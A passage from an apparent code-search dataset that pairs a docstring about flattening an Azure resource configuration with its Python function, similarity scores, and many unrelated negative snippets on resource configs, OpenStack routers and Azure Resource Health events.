"def create_resource_config_files(host_config, resource_config, type_map, bus_map, trecs_root_dir, output_dir, resource_config_dir, model_listen_port, agent_listen_port):\n for host in host_config:\n if host['host_type'] != 'RA':\n continue\n\n resource_name = host['attached_resource_name']\n\n init_data = {\n 'RA': {\n 'ip': '127.0.0.1',\n 'listen_port': agent_listen_port\n },\n 'bus_index': bus_map[resource_name],\n 'listen_port': model_listen_port,\n 'log_path': path.join(output_dir, 'csv', '{}.csv'.format(resource_name))\n }\n\n resource = next(resource for resource in resource_config['resources'] if resource['resource_name'] == resource_name)\n for key in resource.keys():\n if key.endswith('_path'):\n cwd = getcwd()\n chdir(resource_config_dir)\n resource[key] = path.abspath(resource[key])\n chdir(cwd)\n\n final_config = init_data.copy()\n final_config.update(resource)\n\n config_file_name = '{}_config.json'.format(resource_name)\n with open(\n path.join(trecs_root_dir, 'run', config_file_name), 'w'\n ) as init_file:\n dump(final_config, init_file)",
"def get_inventory(self, context):\n # See below some example code demonstrating how to return the resource structure\n # and attributes. In real life, of course, if the actual values are not static,\n # this code would be preceded by some SNMP/other calls to get the actual resource information\n '''\n # Add sub resources details\n sub_resources = [ AutoLoadResource(model ='Generic Chassis',name= 'Chassis 1', relative_address='1'),\n AutoLoadResource(model='Generic Module',name= 'Module 1',relative_address= '1/1'),\n AutoLoadResource(model='Generic Port',name= 'Port 1', relative_address='1/1/1'),\n AutoLoadResource(model='Generic Port', name='Port 2', relative_address='1/1/2'),\n AutoLoadResource(model='Generic Power Port', name='Power Port', relative_address='1/PP1')]\n\n\n attributes = [ AutoLoadAttribute(relative_address='', attribute_name='Location', attribute_value='Santa Clara Lab'),\n AutoLoadAttribute('', 'Model', 'Catalyst 3850'),\n AutoLoadAttribute('', 'Vendor', 'Cisco'),\n AutoLoadAttribute('1', 'Serial Number', 'JAE053002JD'),\n AutoLoadAttribute('1', 'Model', 'WS-X4232-GB-RJ'),\n AutoLoadAttribute('1/1', 'Model', 'WS-X4233-GB-EJ'),\n AutoLoadAttribute('1/1', 'Serial Number', 'RVE056702UD'),\n AutoLoadAttribute('1/1/1', 'MAC Address', 'fe80::e10c:f055:f7f1:bb7t16'),\n AutoLoadAttribute('1/1/1', 'IPv4 Address', '192.168.10.7'),\n AutoLoadAttribute('1/1/2', 'MAC Address', 'te67::e40c:g755:f55y:gh7w36'),\n AutoLoadAttribute('1/1/2', 'IPv4 Address', '192.168.10.9'),\n AutoLoadAttribute('1/PP1', 'Model', 'WS-X4232-GB-RJ'),\n AutoLoadAttribute('1/PP1', 'Port Description', 'Power'),\n AutoLoadAttribute('1/PP1', 'Serial Number', 'RVE056702UD')]\n\n return AutoLoadDetails(sub_resources,attributes)\n '''\n\n self._log(context, 'Begin autoload')\n resources = []\n attributes = []\n\n\n attributes.append(AutoLoadAttribute('', 'replication_address', self.get_replication_address(context)))\n attributes.append(AutoLoadAttribute('', 'connection_key', self.get_connection_key(context)))\n\n networks = self._get_newtork_interfaces(context)\n self._log(context, 'got networks')\n\n controllers = self._get_controllers(context)\n self._log(context, 'got controllers')\n ports = self._get_ports(context)\n\n model = None\n for controller in controllers:\n self._log(context, 'Processing ctrlt: ' + controller['name'] + ':' + controller['model'])\n resources.append(AutoLoadResource(model='Generic Storage Controller', name=controller['name'],\n relative_address=controller['name']))\n if model is None:\n model = controller['model']\n\n attributes.append(AutoLoadAttribute('', 'Model', model))\n\n for network in networks:\n self._log(context, 'Processing netwk: ' + network['name'] + ':' + str(network['address']))\n net_name = network['name']\n controller = net_name.split('.')[0]\n if 'vir0' in controller or 'vir1' in controller:\n attributes.append(AutoLoadAttribute('',str(controller + '_address'), str(network['address'])))\n continue\n if 'vir' in controller:\n continue\n if 'management' not in network['services']:\n continue\n resources.append(AutoLoadResource(model='Storage Network Port', name=net_name,\n relative_address=controller.upper() + '/' + str(network['address'])))\n\n for port in ports:\n if port['iqn'] is not None:\n port_name = port['name']\n controller = port_name.split('.')[0]\n resources.append(AutoLoadResource(model='iSCSI Storage Port', name=port['name'],\n relative_address=controller + '/' + port['portal']))\n attributes.append(AutoLoadAttribute(controller + '/' + port['portal'], 'iqn', port['iqn']))\n elif port['wwn'] is not None:\n port_name = port['name']\n controller = port_name.split('.')[0]\n resources.append(AutoLoadResource(model='FC Storage Port', name=port['name'],\n relative_address=controller + '/' + port['name'].split('.')[1]))\n attributes.append(AutoLoadAttribute(controller + '/' + port['name'].split('.')[1], 'wwn', port['wwn']))\n\n return AutoLoadDetails(resources, attributes)",
"def create_external_resources(self) -> List[ResourceDescription]:\r\n return effects.get_effect_resources()",
"def gen_router_resources(self):\n\n print \"\\t* Adding router resources to compute template\"\n\n from nova import version\n year = version.version_string()\n\n for idx, router in enumerate(self.tenant_routers):\n router_ports = []\n for port in self.all_ports:\n if router[\"id\"] == port[\"device_id\"]:\n router_ports.append(port)\n\n # add the router definition\n if \"2013\" in year:\n # Havana Format\n data = {\"type\": \"OS::Neutron::Router\"}\n self.compute_data[\"resources\"][\"router%s\" % str(idx)] = data\n\n # routers without external gateway\n if router[\"external_gateway_info\"] is not None:\n\n name = {\"get_resource\": \"router%s\" % str(idx)}\n netid = {\"get_param\": \"public_net_%s\" % str(idx)}\n\n # add the router gateway\n data = {\"type\": \"OS::Neutron::RouterGateway\",\n \"properties\": {\n \"router_id\": name,\n \"network_id\": netid\n }}\n\n self.compute_data[\"resources\"][\"router_gateway%s\" % str(idx)] = data\n\n else:\n # Icehouse Format\n rtrName = router[\"name\"]\n # routers without external gateway\n if router[\"external_gateway_info\"] is not None:\n data = {\"type\": \"OS::Neutron::Router\",\n \"properties\": {\n \"name\": rtrName,\n \"external_gateway_info\": {\n \"network\": {\n \"get_param\": \"public_net_%s\" % str(idx)\n }\n }\n }}\n else:\n data = {\"type\": \"OS::Neutron::Router\",\n \"properties\": {\n \"name\": rtrName\n }\n }\n self.compute_data[\"resources\"][\"router%s\" % str(idx)] = data\n\n # internal port information needed\n internal_interfaces = filter(lambda port: port[\"device_owner\"] == \"network:router_interface\", router_ports)\n\n for idxs, interface in enumerate(internal_interfaces):\n # add the router interface\n\n for fixedip in interface[\"fixed_ips\"]:\n\n # create router interface\n data = {\"type\": \"OS::Neutron::RouterInterface\",\n \"properties\": {\n \"router_id\": {\"get_resource\": \"router%s\" % str(idx)},\n \"port_id\": {\"get_resource\": \"port_%s_%s\" % (str(idx), str(idxs))}\n }}\n self.compute_data[\"resources\"][\"router_interface%s_%s\" % (str(idx), str(idxs))] = data\n\n # create router port\n network = self.neutronclient.show_subnet(fixedip[\"subnet_id\"])[\"subnet\"][\"network_id\"]\n net_name = \"%s\" % str(self.neutronclient.show_network(network)[\"network\"][\"name\"])\n net_id = self.neutronclient.show_network(network)[\"network\"][\"id\"]\n\n fixed_ips = [{\"ip_address\": fixedip[\"ip_address\"]}]\n net = self.neutronclient.show_network(network)[\"network\"]\n if net[\"shared\"] is True:\n data = {\"type\": \"OS::Neutron::Port\",\n \"properties\": {\n \"fixed_ips\": fixed_ips,\n \"network_id\": net_id\n }}\n else:\n data = {\"type\": \"OS::Neutron::Port\",\n \"properties\": {\n \"fixed_ips\": fixed_ips,\n \"network_id\": {\"get_resource\": net_name}\n }}\n self.compute_data[\"resources\"][\"port_%s_%s\" % (str(idx), str(idxs))] = data",
"def _get_all_resources(self):\n all_resources = []\n for resource in ResourceModel.scan():\n all_resources.append(resource)\n return all_resources",
"def get_resources(self):\n return []",
"def resource_map(self):",
"def add_resources(event):\n anuket_resources.need()",
"def get_resources(minify=False):\n all_resources = dict()\n subclasses = resource_base.ResourceBase.__subclasses__() + resource_definitions.ResourceAngular.__subclasses__()\n for resource in subclasses:\n obj = resource(minify)\n all_resources[resource.RESOURCE_NAME] = dict(css=tuple(obj.resources_css), js=tuple(obj.resources_js))\n return all_resources",
"def refresh_resources_properties(state, output, update_runtime_props=True):\n resources = {}\n for resource in state.get('resources', []):\n resources[resource[NAME]] = resource\n for module in state.get('modules', []):\n for name, definition in module.get('resources', {}).items():\n resources[name] = definition\n if update_runtime_props:\n ctx.instance.runtime_properties['resources'] = resources\n # Duplicate for backward compatibility.\n ctx.instance.runtime_properties[STATE] = resources\n ctx.instance.runtime_properties['outputs'] = \\\n filter_state_for_sensitive_properties(output)\n store_sensitive_properties(output=output)",
"def __mapAzResourceConfigObject(self, azResourceConfigObj: Dict) -> List[Dict[str, str]]:\n resources = []\n for armType in azResourceConfigObj:\n armResources = azResourceConfigObj[armType]\n\n # Flatten the structure by compiling all the resources corresponding to each ARM type.\n mappedResources = [{ARM_TYPE: armType,\n **armResources[instance]} for instance in armResources]\n resources.extend(mappedResources)\n\n return resources"
] |
[
"0.58181536",
"0.57214403",
"0.5425466",
"0.53549063",
"0.53549063",
"0.53549063",
"0.53435004",
"0.53435004",
"0.53435004",
"0.5334005",
"0.5319617",
"0.5272405",
"0.52459764",
"0.5224623",
"0.52026635",
"0.5195314",
"0.5141163",
"0.5123107",
"0.51167065",
"0.5113912",
"0.5062019",
"0.50595784",
"0.5032333",
"0.50248694",
"0.5008691",
"0.5004105",
"0.5001541",
"0.5000492",
"0.4996896",
"0.49964106"
] |
0.6537761
|
0
|
Map the global Azure resource config mapping to a flat structure.
|
def __mapAzResourceConfigObject(self, azResourceConfigObj: Dict) -> List[Dict[str, str]]:
resources = []
for armType in azResourceConfigObj:
armResources = azResourceConfigObj[armType]
# Flatten the structure by compiling all the resources corresponding to each ARM type.
mappedResources = [{ARM_TYPE: armType,
**armResources[instance]} for instance in armResources]
resources.extend(mappedResources)
return resources
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def resource_map(self):",
"def resource_mapping():\n return {\n 'OS::Heat::ResourceChain': ResourceChain,\n }",
"def resource_map():\n resource_map = deepcopy(BASE_RESOURCE_MAP)\n\n if CompareOpenStackReleases(os_release('keystone')) < 'liberty':\n resource_map.pop(POLICY_JSON)\n if os.path.exists('/etc/apache2/conf-available'):\n resource_map.pop(APACHE_CONF)\n else:\n resource_map.pop(APACHE_24_CONF)\n\n if run_in_apache():\n for cfile in resource_map:\n svcs = resource_map[cfile]['services']\n if 'keystone' in svcs:\n svcs.remove('keystone')\n if 'apache2' not in svcs:\n svcs.append('apache2')\n admin_script = os.path.join(git_determine_usr_bin(),\n \"keystone-wsgi-admin\")\n public_script = os.path.join(git_determine_usr_bin(),\n \"keystone-wsgi-public\")\n resource_map[WSGI_KEYSTONE_API_CONF] = {\n 'contexts': [\n context.WSGIWorkerConfigContext(name=\"keystone\",\n admin_script=admin_script,\n public_script=public_script),\n keystone_context.KeystoneContext()],\n 'services': ['apache2']\n }\n return resource_map",
"def load_resource_map():\n # to avoid a circular dependency\n from coinbase_commerce.api_resources.base import APIResource\n global RESOURCE_MAP\n RESOURCE_MAP = {k.RESOURCE_NAME: k for k in APIResource.get_subclasses()\n if getattr(k, \"RESOURCE_NAME\", None)}",
"def create_resource_config_files(host_config, resource_config, type_map, bus_map, trecs_root_dir, output_dir, resource_config_dir, model_listen_port, agent_listen_port):\n for host in host_config:\n if host['host_type'] != 'RA':\n continue\n\n resource_name = host['attached_resource_name']\n\n init_data = {\n 'RA': {\n 'ip': '127.0.0.1',\n 'listen_port': agent_listen_port\n },\n 'bus_index': bus_map[resource_name],\n 'listen_port': model_listen_port,\n 'log_path': path.join(output_dir, 'csv', '{}.csv'.format(resource_name))\n }\n\n resource = next(resource for resource in resource_config['resources'] if resource['resource_name'] == resource_name)\n for key in resource.keys():\n if key.endswith('_path'):\n cwd = getcwd()\n chdir(resource_config_dir)\n resource[key] = path.abspath(resource[key])\n chdir(cwd)\n\n final_config = init_data.copy()\n final_config.update(resource)\n\n config_file_name = '{}_config.json'.format(resource_name)\n with open(\n path.join(trecs_root_dir, 'run', config_file_name), 'w'\n ) as init_file:\n dump(final_config, init_file)",
"def pre_config_root_create(self, resource_dict):\n pass",
"def pre_global_vrouter_config_create(self, resource_dict):\n pass",
"def pre_global_system_config_create(self, resource_dict):\n pass",
"def get_configmap_dict():\n template = textwrap.dedent(\n \"\"\"\n kind: ConfigMap\n apiVersion: v1\n metadata:\n name: fio-config\n data:\n workload.fio: |\n # here comes workload configuration\n \"\"\"\n )\n cm_dict = yaml.safe_load(template)\n return cm_dict",
"def post_config_root_read(self, resource_id, resource_dict):\n pass",
"def post_global_vrouter_config_read(self, resource_id, resource_dict):\n pass",
"def add_custom_resources(resources, resource_mapping=RESOURCE_MAPPING):\n for key, val in resources.items():\n if key not in resource_mapping:\n resource_mapping[key] = tuple()\n\n # make sure the resource name itself is an alias\n resource_mapping[key] += (key,)\n if isinstance(val, list):\n for alias in val:\n if val != key:\n resource_mapping[key] += (alias,)\n else:\n if val != key:\n resource_mapping[key] += (val,)",
"def post_global_system_config_read(self, resource_id, resource_dict):\n pass",
"def post_config_root_create(self, resource_dict):\n pass",
"def pre_global_vrouter_config_update(self, resource_id, resource_dict):\n pass",
"def set_global_sqla_resources(sqla_resources):\n md = sqla_resources.get_metadata()\n #_bind_tables_to_metadata(md, nest_project)\n GLOBAL_SQLA_RESOURCES = sqla_resources\n return",
"def pre_config_root_update(self, resource_id, resource_dict):\n pass",
"def map_to_app_resources(self, app):\n # TODO: Extract resources app data\n pass",
"def generate_config(context):\n\n properties = context.properties\n\n base_resource = get_type(context)\n\n resources = []\n\n if 'dependsOn' in properties:\n dependson = {'metadata': {'dependsOn': properties['dependsOn']}}\n dependson_root = properties['dependsOn']\n else:\n dependson = {}\n dependson_root = []\n\n for role in properties['roles']:\n for member in role['members']:\n suffix = sha1(\n '{}-{}'.format(role['role'], member).encode('utf-8')).hexdigest()[:10]\n policy_get_name = '{}-{}'.format(context.env['name'], suffix)\n\n resource_name = '{}-{}'.format(policy_get_name,\n base_resource['postfix'])\n iam_resource = {\n 'name': resource_name,\n # TODO - Virtual type documentation needed\n 'type': base_resource['dm_type'],\n 'properties': {\n base_resource['dm_resource_property']: base_resource['id'],\n 'role': role['role'],\n 'member': member,\n }\n }\n iam_resource.update(dependson)\n resources.append(iam_resource)\n\n dependson = {'metadata': {'dependsOn': [\n resource_name] + dependson_root}}\n\n return {\"resources\": resources}",
"def pre_global_system_config_update(self, resource_id, resource_dict):\n pass",
"def _get_config_map():\n path = os.path.join(os.path.dirname(__file__), \"nadamw_configs.json\")\n configs = json.loads(open(path).read())\n return configs",
"def post_global_system_config_create(self, resource_dict):\n pass",
"def loadConfig():\n global abs_path, app_list, app_api_subs\n\n # load application details\n with open(abs_path + '/../../../../config/apim.yaml', 'r') as file:\n apim_config = yaml.load(file, Loader=yaml.FullLoader)\n apps = apim_config['apps']\n\n for app in apps:\n app_list[app['name']] = []\n app_api_subs[app['name']] = app['api_subscriptions'].split(',')",
"def post_global_vrouter_config_create(self, resource_dict):\n pass",
"def restart_map():\n _map = []\n for f, ctxt in CONFIG_FILES.iteritems():\n svcs = []\n for svc in ctxt['services']:\n svcs.append(svc)\n if svcs:\n _map.append((f, svcs))\n return OrderedDict(_map)",
"def _convert_resources_to_urls(\n self, configuration_dict: Dict[str, Any]\n ) -> Dict[str, Any]:\n configuration_dict = deepcopy(configuration_dict)\n existing_machine_type = configuration_dict[\"machineType\"]\n if not re.search(\".*/machineTypes/.*\", existing_machine_type):\n configuration_dict[\n \"machineType\"\n ] = \"zones/{zone}/machineTypes/{machine_type}\".format(\n zone=self.availability_zone,\n machine_type=configuration_dict[\"machineType\"],\n )\n\n for accelerator in configuration_dict.get(\"guestAccelerators\", []):\n gpu_type = accelerator[\"acceleratorType\"]\n if not re.search(\".*/acceleratorTypes/.*\", gpu_type):\n accelerator[\n \"acceleratorType\"\n ] = \"projects/{project}/zones/{zone}/acceleratorTypes/{accelerator}\".format( # noqa: E501\n project=self.project_id,\n zone=self.availability_zone,\n accelerator=gpu_type,\n )\n\n return configuration_dict",
"def _get_config_dict():\r\n return CONFIGS",
"def generate_config(context):\n\n resources = []\n properties = context.properties\n project_id = properties.get('project', context.env['project'])\n name = properties.get('name', context.env['name'])\n\n resource = {\n 'name': context.env['name'],\n # https://cloud.google.com/filestore/docs/reference/rest/v1beta1/projects.locations.instances/create\n 'type': 'gcp-types/file-v1beta1:projects.locations.instances',\n 'properties': {\n 'parent': 'projects/{}/locations/{}'.format(project_id, properties['location']),\n 'instanceId': name,\n }\n }\n\n optional_props = [\n 'description',\n 'tier',\n 'labels',\n 'fileShares',\n 'networks',\n ]\n\n for prop in optional_props:\n if prop in properties:\n resource['properties'][prop] = properties[prop]\n\n resources.append(resource)\n\n return {\n 'resources':\n resources,\n 'outputs':\n [\n {\n 'name': 'name',\n 'value': name\n },\n {\n 'name': 'fileShares',\n 'value': '$(ref.{}.fileShares)'.format(context.env['name'])\n },\n {\n 'name': 'networks',\n 'value': '$(ref.{}.networks)'.format(context.env['name'])\n }\n ]\n }",
"def pre_global_vrouter_config_read(self, resource_id):\n pass",
"def _build_elbv2_mapping_from_resources(resource_to_analyse, result_dict, session):\n for elb_instance, security_group_id, security_group_name in _generate_elb_instances_and_sg(resource_to_analyse, session):\n resource_dict = _check_if_in_list(result_dict, elb_instance[\"LoadBalancerName\"], \"resource_id\")\n if resource_dict is not None:\n resource_dict[\"sg_attached\"].append({\n \"sg_id\": security_group_id,\n \"sg_name\": security_group_name\n })\n else:\n result_dict.append({\n \"resource_id\": elb_instance[\"LoadBalancerName\"],\n \"resource_type\": \"elb\",\n \"sg_attached\": [{\n \"sg_id\": security_group_id,\n \"sg_name\": security_group_name\n }]\n })\n return result_dict"
] |
[
"0.65116477",
"0.6337193",
"0.59461796",
"0.5896368",
"0.58180165",
"0.56846714",
"0.5651048",
"0.5638168",
"0.55788946",
"0.5516219",
"0.55128187",
"0.5509055",
"0.53902495",
"0.53838235",
"0.5382216",
"0.53783756",
"0.537411",
"0.53525007",
"0.53490853",
"0.53422743",
"0.53149796",
"0.53145057",
"0.5269981",
"0.5256161",
"0.52411956",
"0.52128375",
"0.5205212",
"0.5204206",
"0.51885974",
"0.51847947"
] |
0.68334466
|
0
|
Remoce the duplicate dictionaries from a list.
|
def __removeDuplicateDictsFromList(self, listOfDicts: List[Dict[str, str]]) -> List[Dict[str, str]]:
return list({frozenset(item.items()): item for item in listOfDicts}.values())
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def remove_duplicates(input_list):\n return list(dict.fromkeys(input_list))",
"def remove_duplicate_dicts(data: List[dict]) -> List[dict]:\n return [dict(y) for y in set(tuple(x.items()) for x in data)]",
"def removeDups(lst):\n\n return list(dict.fromkeys(lst) )",
"def _remove_duplicates(input_list):\n return list(OrderedDict.fromkeys(input_list))",
"def delete_duplicate(x):\n return list(dict.fromkeys(x))",
"def duplicates(self, x):\n return list(dict.fromkeys(x))",
"def find_duplicates(inlist):\n \n D = defaultdict(list)\n for i,item in enumerate(mylist):\n D[item].append(i)\n D = {k:v for k,v in list(D.items()) if len(v)>1}\n \n return D",
"def _coalesce_dicts(self, list_of_dicts):\n coalesced_list_of_dicts = [{}]\n for item in list_of_dicts:\n found = False\n for dict_items in coalesced_list_of_dicts:\n if list(item.keys())[0] not in dict_items:\n dict_items.update(item)\n found = True\n break\n if not found:\n coalesced_list_of_dicts.append(item)\n return coalesced_list_of_dicts",
"def unique(list_: List) -> List:\n return list(collections.OrderedDict.fromkeys(list_))",
"def _uniq( list ) : \r\n \r\n d = {} \r\n for e in list : \r\n d[e] = 1 \r\n \r\n return d.keys()",
"def _uniq(self, lst):\n h = {}\n for e in lst:\n h[e] = 1\n return sorted(h.keys())",
"def removeDuplicates(list):\n\treturn Set((item for item in list))",
"def remove_duplicates(input, create=False):\n # input is a list of dicts\n seen = set()\n filtered_list = []\n for attr_dict in input:\n str_repr = make_string(attr_dict, create=create)\n if str_repr not in seen:\n seen.add(str_repr)\n filtered_list.append(attr_dict)\n\n return filtered_list",
"def _deduplicate(lst):\n out = []\n for i in lst:\n if i not in out:\n out.append(i)\n return out",
"def test_magicdictlist_dedupe():\n d1 = magicdictlist()\n\n d1['key1'].append('1 hello')\n d1['key1'].append('1 world')\n d1['key2'].append('2 hello')\n d1['key1'].append('1 world')\n\n d2 = d1.dedupe()\n assert len(d2) == 2\n assert len(d2['key1']) == 2\n assert len(d2['key2']) == 1\n assert set(d2['key1']) == set(['1 hello', '1 world'])\n assert d2['key2'] == ['2 hello']",
"def Deduplicate(items):\n seen = set()\n for it in items:\n if it not in seen:\n seen.add(it)\n yield it",
"def dict_copies(my_dict, num_copies):\n answer = []\n for idx in range(num_copies):\n answer.append(dict(my_dict))\n return answer",
"def remove_duplicates(self,list_):\r\n ret =[]\r\n\r\n for item in list_:\r\n if item not in ret:\r\n ret.append(item)\r\n removed = len(list_)-len(ret)\r\n logger.info('%d duplicate%s removed.' %(removed,plural_or_not(removed)))\r\n return ret",
"def duplicate_train_items(train_items: List[JSONDict]) -> List[JSONDict]:\n train_items[1][\"url\"] = train_items[0][\"url\"]\n return train_items",
"def removeDuplicates(list):\n\treturn set((item for item in list))",
"def uniqueDicts(obj):\n return [json.loads(d) for d in set(json.dumps(r, sort_keys=True) for o in obj)]",
"def remove_duplicates(data):\n already_used_items = {}\n return_data = []\n\n for item in data:\n # Yes, I know that I can find used items in the return_data,\n # but HW requires this logic.\n if not already_used_items.get(item):\n return_data.append(item)\n already_used_items[item] = True\n\n return return_data",
"def deduped(items):\n\n # # create an empty dictionary\n # # create an emtpy list that we will return \n # # Loop through the items in the list, if the item is not in the dict, add item to the list, and to the dict\n # # If the item is in the dict, increase the count by 1\n # # If the item is in the dict already, dont add the item to the list\n # # return list\n\n\n # duplicate_counts = {}\n\n # deduped = []\n\n # for item in items:\n # duplicate_counts[item] = duplicate_counts.get(item, 0) + 1\n\n\n # if duplicate_counts[item] == 1:\n # deduped.append(item)\n\n # return deduped\n\n ##################### HB SOLUTION ####################################\n\n # # sets are great for de-duplicating lists:\n # # sets dont maintain oder though, so if we want our answer to be in order\n # # we have to do the de-duplicating by hand\n # # however... this runtime would be O(n^2) becaause we have a for loop\n # # and nested inside that, we have an in which is a hidden for-loop\n # # for every charecter that we are looping over, we have to loop in deduped\n # # to check if that charecter is in there\n # # we dont want this \n\n # deduped = []\n\n # for char in items:\n # if char not in deduped:\n # deduped.append(char)\n \n # return deduped\n\n # instead we can use use a set to keep track of what we have seen and use a list\n # to hold the final results\n\n # keep track of what we have seen\n seen = set()\n\n # deduped will be what we return \n deduped = []\n\n for item in items:\n if item not in seen:\n deduped.append(item)\n seen.add(item)\n\n return deduped",
"def has_duplicates_dict(L):\r\n unique = {}\r\n for e in L:\r\n if e in unique:\r\n return True\r\n unique[e] = 0\r\n return False",
"def unique_list(src_list):\n return list(OrderedDict.fromkeys(src_list).keys())",
"def unique_dicts(d):\n return [dict(y) for y in set(tuple(x.items()) for x in d)]",
"def deduplicate_list(lst):\n return list(set(lst))",
"def dedup(iterable):\n return iter(OrderedDict.fromkeys(iterable))",
"def remove_duplicates_in_items(items: list, id_key: str) -> list:\n ids = {}\n new_items = []\n for item in items:\n item_id = item.get(id_key)\n if item_id not in ids:\n ids[item_id] = True\n new_items.append(item)\n\n return new_items",
"def diff_list_of_dict(old_list, new_list):\n new_set = set([dict2str(i) for i in new_list])\n old_set = set([dict2str(i) for i in old_list])\n added = new_set - old_set\n removed = old_set - new_set\n return [str2dict(a) for a in added], [str2dict(r) for r in removed]"
] |
[
"0.7726228",
"0.7527608",
"0.743368",
"0.7322726",
"0.67764497",
"0.6705668",
"0.660935",
"0.65197814",
"0.6485394",
"0.6389307",
"0.62858564",
"0.62466526",
"0.6226824",
"0.6189385",
"0.6180072",
"0.6164874",
"0.616072",
"0.6154857",
"0.6145726",
"0.6128122",
"0.6096065",
"0.6069391",
"0.6067368",
"0.6065973",
"0.60167134",
"0.5959633",
"0.59559625",
"0.5955381",
"0.595019",
"0.59434795"
] |
0.7735982
|
0
|
Fetch health events using RH API and update the lastResult variable.
|
def __getRHEventsAndUpdateResult(self, resource: Dict[str, str]) -> None:
# Validate the state data.
self.__validateResourceStateEntry(resource)
self.tracer.info("[%s] Fetching the RH events for resource = %s" % (
self.fullName, resource[AZ_RESOURCE_ID]))
# Extract the polling state for the current resource.
resourcePollingState = self.pollingState.get(
resource[AZ_RESOURCE_ID], {})
self.tracer.info("[%s] polling state for resource with Id = %s is %s" % (
self.fullName, resource[AZ_RESOURCE_ID], resourcePollingState))
rcaPollingState = resourcePollingState.get(RCA, [])
self.tracer.info("[%s] RCA polling state for resource with Id = %s is %s" % (
self.fullName, resource[AZ_RESOURCE_ID], rcaPollingState))
# Parse the minimum time. datetime.min can't be used as the year is not formatted with zero padding.
datetimeMin = datetime.strptime(MIN_DATETIME, OCCURED_TIME_FORMAT[0])
# Fetch the occuredTime of the last record that was pushed to LA for the given resource.
lastOccuredTime = resourcePollingState.get(
LAST_OCCURED_TIME, datetimeMin)
self.tracer.info("[%s] lastOccuredTime from polling state for resource with Id = %s is %s" % (
self.fullName, resource[AZ_RESOURCE_ID], lastOccuredTime))
# Variable to store updated occuredTime in case new health events are obtained from RH.
updatedLastOccuredTime = lastOccuredTime
try:
rhEvents = self.rhClient.getHistoricalResourceAvailabilityEvents(
self.providerInstance.ctx.authToken, resource[AZ_RESOURCE_ID])
self.tracer.info("[%s] number of RH events received = %s; resourceId=%s; numberOfEventsCompiledForAllResourcesSoFar=%s" % (
self.fullName, len(rhEvents), resource[AZ_RESOURCE_ID], len(self.lastResult)))
numberOfNewEvents = 0
rhEventIds = []
for event in rhEvents:
hasRca = False
rhEventIds.append(event[ID])
currentOccuredTime = self.__parseOccuredTime(
event[PROPERTIES][OCCURED_TIME])
# Update the lastOccuredTime which can be stored in the state file for the current resource.
if currentOccuredTime > updatedLastOccuredTime:
updatedLastOccuredTime = currentOccuredTime
# Check if the event has been previously processed using the occuredTime.
# This will occur because the health events are obtained for the last one day and the polling frequency is 15 minutes.
# In case the event has RCA, the event will have the same occuredTime as the transition event for the same issue. Additional checks are required.
if currentOccuredTime <= lastOccuredTime:
if self.__isNotRcaEvent(event):
# Skip this event. This has already been processed.
continue
else:
# This is an RCA event.
eventTitle = event[PROPERTIES][TITLE] if TITLE in event[PROPERTIES] else None
self.tracer.info("[%s] RCA event older than lastOccuredTime received for resourceId=%s; RH event id=%s; title=%s" % (
self.fullName, resource[AZ_RESOURCE_ID], event[ID], eventTitle))
hasRca = True
if event[ID] in rcaPollingState:
# Skip this event. The RCA event has been processed before.
continue
# New RCA event has been received. Add it to the state variable.
rcaPollingState.append(event[ID])
numberOfNewEvents += 1
# Sanitize the data and add additional data related to the resource. HTML tags are converted to markdown format and action tags are removed.
sanitizedEvent = self.__sanitizeEvent(event, resource, hasRca)
self.lastResult.extend([sanitizedEvent])
self.tracer.info("[%s] resourceId=%s; number of RH events received = %s; numberOfNewEvents=%s; updatedLastOccuredTime=%s" % (
self.fullName, resource[AZ_RESOURCE_ID], len(rhEvents), numberOfNewEvents, updatedLastOccuredTime))
# Clean up rcaPollingState to remove the stale entries.
rcaEventCountBeforeCleanUp = len(rcaPollingState)
rcaPollingState = self.__cleanRcaPollingState(
rhEventIds, rcaPollingState)
self.tracer.info("[%s] resourceId=%s; rcaEventCountBeforeCleanUp = %s; rcaEventCountAfterCleanUp=%s" % (
self.fullName, resource[AZ_RESOURCE_ID], rcaEventCountBeforeCleanUp, len(rhEvents)))
# Update the values for the current resource in the shared state dictionary.
self.pollingState[resource[AZ_RESOURCE_ID]] = {
LAST_OCCURED_TIME: updatedLastOccuredTime, LAST_RUN_TIMESTAMP: datetime.now(), RCA: rcaPollingState}
except Exception as e:
self.tracer.error(
"[%s] Failed to get RH events and update the result for the resource with azResourceId=%s. numberOfEventsCompiledForAllResourcesSoFar=%s (%s)", self.fullName, resource[AZ_RESOURCE_ID], len(self.lastResult), e, exc_info=True)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _actionGetRHEvents(self):\n self.lastResult = []\n self.pollingState = self.state.get(POLLING_STATE, {})\n\n # Get resources for which AIOps is enabled.\n resources = self.__compileAIOpsEnabledResources()\n self.tracer.info(\"[%s] There are %s resources compiled for fetching RH events and they are %s\" % (\n self.fullName, len(resources), resources))\n\n # Get an iterator for the resources. Using iterator ensures that we loop over the resources list only once while submitting to the threadpoolexecutor.\n resourcesIterator = iter(resources)\n\n # Initialize a threadpoolexecutor to parallelize RH calls. Using with statement to ensure clean up of threadpoolexecutor object.\n with ThreadPoolExecutor(NUMBER_OF_RH_THREADS) as executor:\n # Schedule the first N calls. Not scheduling them all at once, to avoid consuming excessive amounts of memory.\n futures = {\n executor.submit(self.__getRHEventsAndUpdateResult, resource): resource\n for resource in itertools.islice(resourcesIterator, NUMBER_OF_RH_THREADS)\n }\n\n while futures:\n # Wait for a call to complete.\n completedFutures, futures = wait(\n futures, timeout=MAX_TIMEOUT, return_when=FIRST_COMPLETED\n )\n\n # Schedule the next set of calls based on the number of completed calls. There shouldn't be more than NUMBER_OF_RH_THREADS calls in the pool at a time, to keep memory consumption down.\n for resource in itertools.islice(resourcesIterator, len(completedFutures)):\n futures.add(\n executor.submit(\n self.__getRHEventsAndUpdateResult, resource)\n )\n\n self.tracer.info(\"[%s] The number of health events compiled = %s\" % (\n self.fullName, len(self.lastResult)))\n self.updateState()",
